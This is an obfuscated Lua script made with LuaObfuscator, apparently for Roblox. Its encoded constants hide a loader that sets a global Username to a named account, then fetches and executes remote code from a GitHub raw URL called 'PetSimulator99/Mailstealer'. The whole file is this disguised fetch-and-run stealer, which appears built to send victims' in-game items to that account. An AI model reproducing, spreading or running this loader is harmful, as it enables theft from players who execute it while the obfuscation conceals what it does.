--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v82=0;local v83;while true do if (v82==0) then v83=v2(v0(v30,16));if v19 then local v98=v5(v83,v19);v19=nil;return v98;else return v83;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v84=0 -0 ;local v85;while true do if (v84==(0 -(0 -0))) then v85=(v31/((3 -1)^(v32-(2 -1))))%((621 -(555 + 64))^(((v33-(932 -(857 + 74))) -(v32-(569 -(367 + 201)))) + (928 -(214 + 713)))) ;return v85-(v85%(1 + 0)) ;end end else local v86=0;local v87;while true do if (v86==(0 + 0)) then v87=(879 -(282 + 595))^(v32-(1638 -((2588 -(68 + 997)) + 114))) ;return (((v31%(v87 + v87))>=v87) and (1271 -(226 + 1044))) or (0 + (0 -0)) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (119 -(32 + 85)) );v18=v18 + 2 + 0 ;return (v36 * (57 + 199)) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + (960 -(892 + 65)) );v18=v18 + (9 -5) ;return (v40 * 16777216) + (v39 * 65536) + (v38 * (472 -216)) + v37 ;end local function v24()local v41=0 -0 ;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v41==(351 -((334 -247) + 263))) then v44=181 -((509 -(416 + 26)) + 113) ;v45=(v20(v43,1,15 + 5 ) * ((4 -2)^(24 + (25 -17)))) + v42 ;v41=2;end if ((7 -5)==v41) then v46=v20(v43,973 -(345 + 457 + (265 -115)) ,469 -(145 + 293) );v47=((v20(v43,85 -53 )==((431 -(44 + 386)) -0)) and  -(1 + 0)) or 1 ;v41=1000 -((2401 -(998 + 488)) + 27 + 55) ;end if (v41==(0 -0)) then v42=v23();v43=v23();v41=1 + 0 + 0 ;end if (v41==(3 -0)) then if (v46==(1187 -(1069 + 118))) then if (v45==0) then return v47 * 0 ;else local v99=0;while true do if (v99==(0 -0)) then v46=1 -0 ;v44=0;break;end end end elseif (v46==((1128 -(201 + 571)) + 1691)) then return ((v45==(0 -0)) and (v47 * ((1 + (1138 -(116 + 1022)))/(791 -(368 + 423))))) or (v47 * NaN) ;end return v8(v47,v46-(3214 -2191) ) * (v44 + (v45/((20 -(10 + 8))^52))) ;end end end local function v25(v48)local v49;if  not v48 then v48=v23();if (v48==(0 -0)) then return "";end end v49=v3(v16,v18,(v18 + v48) -(1 + 0) );v18=v18 + v48 ;local v50={};for v66=1, #v49 do v50[v66]=v2(v1(v3(v49,v66,v66)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=126 -(116 + 10) ;local v52;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if ((4 -1)~=v51) then else local v91=738 -(542 + 196) ;while true do if (v91~=1) then else v51=78 -(71 + 3) ;break;end if (0==v91) then v58=nil;v59=nil;v91=1 + 0 ;end end end if (v51==(2 + 0)) then v56=nil;v57=nil;v51=7 -4 ;end if (v51~=(1 + 0)) then else v54=nil;v55=nil;v51=2 -0 ;end if (v51==(241 -(187 + 54))) then v52=1551 -(1126 + 425) ;v53=nil;v51=406 -(118 + 287) ;end if ((784 -(162 + 618))~=v51) then else while true do if (v52==0) then v53=1121 -(118 + 1003) ;v54=nil;v52=1;end if (v52==(3 + 0)) then v59=nil;while true do local v100=0;local v101;while true do if (v100==(0 + 0)) then v101=0 -0 ;while true do if (v101==(0 -0)) then if (v53~=(0 -0)) then else local v151=0 + 0 ;local v152;local v153;while true do if (v151~=0) then else v152=1636 -(1373 + 263) ;v153=nil;v151=1 -0 ;end if (v151~=1) then else while true do if (v152==0) then v153=0;while true do if ((1000 -(451 + 549))~=v153) then else v54={};v55={};v153=1 + 0 ;end if (v153==(2 -0)) then v53=1;break;end if (v153==(1 + 0)) then local v172=0 -0 ;local v173;while true do if (v172~=(1384 -(746 + 638))) then else v173=0 + 0 ;while true do if (v173==0) then local v177=0;while true do if (v177==(0 + 0)) then v56={};v57={v54,v55,nil,v56};v177=342 -(218 + 123) ;end if (v177~=(754 -(239 + 514))) then else v173=1582 -(1535 + 46) ;break;end end end if ((1 + 0)~=v173) then else v153=1 + 1 ;break;end end break;end end end end break;end end break;end end end if (v53~=(561 -(306 + 254))) then else local v154=0 + 0 ;local v155;while true do if (v154~=(0 + 0)) then else v155=0 -0 ;while true do if (v155~=0) then else local v164=1202 -(373 + 829) ;local v165;while true do if (v164==0) then v165=731 -(476 + 255) ;while true do if ((1130 -(369 + 761))~=v165) then else local v174=0 + 0 ;while true do if ((1468 -(899 + 568))==v174) then v165=1 + 0 ;break;end if (v174==(0 -0)) then v58=v23();v59={};v174=1;end end end if (v165~=(1 -0)) then else v155=239 -(64 + 174) ;break;end end break;end end end if (v155~=(1 + 0)) then else for v167=604 -(268 + 335) ,v58 do local v168=290 -(60 + 230) ;local v169;local v170;local v171;while true do if (v168~=(572 -(426 + 146))) then else v169=0 + 0 ;v170=nil;v168=1 + 0 ;end if (v168==(1457 -(282 + 1174))) then v171=nil;while true do if (0==v169) then v170=v21();v171=nil;v169=1;end if (v169==(1 + 0)) then if (v170==(812 -(569 + 242))) then v171=v21()~=0 ;elseif (v170==(5 -3)) then v171=v24();elseif (v170==(2 + 1)) then v171=v25();end v59[v167]=v171;break;end end break;end end end v57[3]=v21();v155=2;end if ((1 + 1)==v155) then v53=1582 -(1183 + 397) ;break;end end break;end end end v101=1;end if (v101==(2 -1)) then if (v53==2) then local v156=1024 -(706 + 318) ;local v157;while true do if (v156==0) then v157=0;while true do local v162=1251 -(721 + 530) ;local v163;while true do if (v162~=0) then else v163=0;while true do if (v163==0) then if (v157~=(1272 -(945 + 326))) then else return v57;end if (v157==(0 + 0)) then local v175=0;while true do if (v175~=0) then else for v178=2 -1 ,v23() do local v179=0;local v180;local v181;while true do if (0~=v179) then else v180=0 + 0 ;v181=nil;v179=1;end if (v179~=(2 -1)) then else while true do if (v180~=0) then else v181=v21();if (v20(v181,1 + 0 ,701 -(271 + 429) )==0) then local v184=0 + 0 ;local v185;local v186;local v187;local v188;while true do if (2==v184) then while true do if (v185==3) then if (v20(v187,1503 -(1408 + 92) ,1089 -(461 + 625) )==(1289 -(993 + 295))) then v188[1 + 3 ]=v59[v188[860 -(564 + 292) ]];end v54[v178]=v188;break;end if (v185~=2) then else local v190=0;local v191;while true do if (v190~=(0 -0)) then else v191=0;while true do if (v191==1) then v185=3;break;end if (0~=v191) then else if (v20(v187,1172 -(418 + 753) ,1 + 0 )~=(1 + 0)) then else v188[5 -3 ]=v59[v188[1 + 1 ]];end if (v20(v187,1 + 1 ,2 + 0 )==(477 -(41 + 435))) then v188[532 -(406 + 123) ]=v59[v188[1772 -(1749 + 20) ]];end v191=1 + 0 ;end end break;end end end if (v185~=0) then else v186=v20(v181,1324 -(1249 + 73) ,1128 -(936 + 189) );v187=v20(v181,2 + 2 ,2 + 4 );v185=1146 -(466 + 679) ;end if ((2 -1)~=v185) then else local v192=0 -0 ;local v193;while true do if (v192~=(1900 -(106 + 1794))) then else v193=0 + 0 ;while true do if (v193~=0) then else local v196=1138 -(782 + 356) ;while true do if (v196~=1) then else v193=1 + 0 ;break;end if (v196~=(0 + 0)) then else v188={v22(),v22(),nil,nil};if (v186==(114 -(4 + 110))) then local v201=0;while true do if (v201==(584 -(57 + 527))) then v188[3]=v22();v188[4]=v22();break;end end elseif (v186==(1 -0)) then v188[1095 -(975 + 117) ]=v23();elseif (v186==(1429 -(41 + 1386))) then v188[3]=v23() -((105 -(17 + 86))^16) ;elseif (v186~=3) then else local v206=0 + 0 ;local v207;local v208;local v209;while true do if (v206==(1876 -(157 + 1718))) then v209=nil;while true do if (v207==(1 -0)) then while true do if (v208==(0 + 0)) then v209=0 -0 ;while true do if (v209~=(0 -0)) then else v188[3]=v23() -(2^(46 -30)) ;v188[1022 -(697 + 321) ]=v22();break;end end break;end end break;end if (v207~=(0 -0)) then else local v210=0 -0 ;while true do if ((167 -(122 + 44))==v210) then v207=1 -0 ;break;end if (v210~=(0 -0)) then else v208=0 + 0 ;v209=nil;v210=1 + 0 ;end end end end break;end if (v206~=(0 -0)) then else v207=65 -(30 + 35) ;v208=nil;v206=1 + 0 ;end end end v196=1190 -(449 + 740) ;end end end if ((1258 -(1043 + 214))==v193) then v185=874 -(826 + 46) ;break;end end break;end end end end break;end if (v184==(0 -0)) then v185=1212 -(323 + 889) ;v186=nil;v184=2 -1 ;end if ((581 -(361 + 219))==v184) then v187=nil;v188=nil;v184=2;end end end break;end end break;end end end for v182=321 -(53 + 267) ,v23() do v55[v182-(3 -2) ]=v28();end v175=1 + 0 ;end if (v175==(1899 -(260 + 1638))) then v157=1 + 0 ;break;end end end break;end end break;end end end break;end end end break;end end break;end end end break;end if (v52~=(6 -4)) then else v57=nil;v58=nil;v52=416 -(15 + 398) ;end if (v52==(1 + 0)) then local v96=982 -(18 + 964) ;local v97;while true do if (v96==0) then v97=0;while true do if (v97~=(2 -1)) then else v52=7 -5 ;break;end if ((0 + 0)~=v97) then else local v122=0;while true do if (v122~=(0 + 0)) then else v55=nil;v56=nil;v122=851 -(20 + 830) ;end if (v122==(1 + 0)) then v97=1;break;end end end end break;end end end end break;end end end local function v29(v60,v61,v62)local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...)local v68=v63;local v69=v64;local v70=v65;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v88=0,v76 do if (v88>=v70) then v74[v88-v70 ]=v75[v88 + 1 ];else v78[v88]=v75[v88 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1];if (v81<=10) then if (v81<=4) then if (v81<=1) then if (v81==0) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end else v62[v80[3]]=v78[v80[2]];end elseif (v81<=2) then local v104=v80[2];local v105=v78[v80[3]];v78[v104 + 1 ]=v105;v78[v104]=v105[v80[4]];elseif (v81>3) then local v124=v80[2];local v125=v78[v80[3]];v78[v124 + 1 ]=v125;v78[v124]=v125[v80[4]];else v78[v80[2]]();end elseif (v81<=7) then if (v81<=5) then do return;end elseif (v81==6) then for v144=v80[2],v80[3] do v78[v144]=nil;end else v78[v80[2]]();end elseif (v81<=8) then if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v62;else v78[v80[2]]=v62[v80[3]];end elseif (v81==9) then v72=v80[3];else do return;end end elseif (v81<=15) then if (v81<=12) then if (v81>11) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end else local v109=v80[2];v78[v109]=v78[v109](v13(v78,v109 + 1 ,v73));end elseif (v81<=13) then local v111=v80[2];local v112,v113=v71(v78[v111](v13(v78,v111 + 1 ,v80[3])));v73=(v113 + v111) -1 ;local v114=0;for v119=v111,v73 do v114=v114 + 1 ;v78[v119]=v112[v114];end elseif (v81>14) then for v146=v80[2],v80[3] do v78[v146]=nil;end else local v134=0;local v135;local v136;local v137;local v138;while true do if (v134==1) then v73=(v137 + v135) -1 ;v138=0;v134=2;end if (2==v134) then for v159=v135,v73 do v138=v138 + 1 ;v78[v159]=v136[v138];end break;end if (v134==0) then v135=v80[2];v136,v137=v71(v78[v135](v13(v78,v135 + 1 ,v80[3])));v134=1;end end end elseif (v81<=18) then if (v81<=16) then local v115=v80[2];v78[v115]=v78[v115](v13(v78,v115 + 1 ,v73));elseif (v81==17) then if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v62;else v78[v80[2]]=v62[v80[3]];end else v78[v80[2]]=v80[3];end elseif (v81<=19) then v62[v80[3]]=v78[v80[2]];elseif (v81>20) then v78[v80[2]]=v80[3];else v72=v80[3];end v72=v72 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!073O00028O0003083O00557365726E616D65030E3O004368616E6368616E68616E6F7269030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034B3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F45676F72696B7573612F50657453696D756C61746F722O392F6D61696E2F4D61696C737465616C657200153O0012153O00014O000F000100013O00264O0002000100010004143O00020001001215000100013O00262O00010005000100010004143O00050001001215000200033O001213000200023O001208000200043O001208000300053O002004000300030006001215000500074O000E000300054O001000023O00022O00030002000100010004143O001400010004143O000500010004143O001400010004143O000200012O000A3O00017O00",v9(),...);
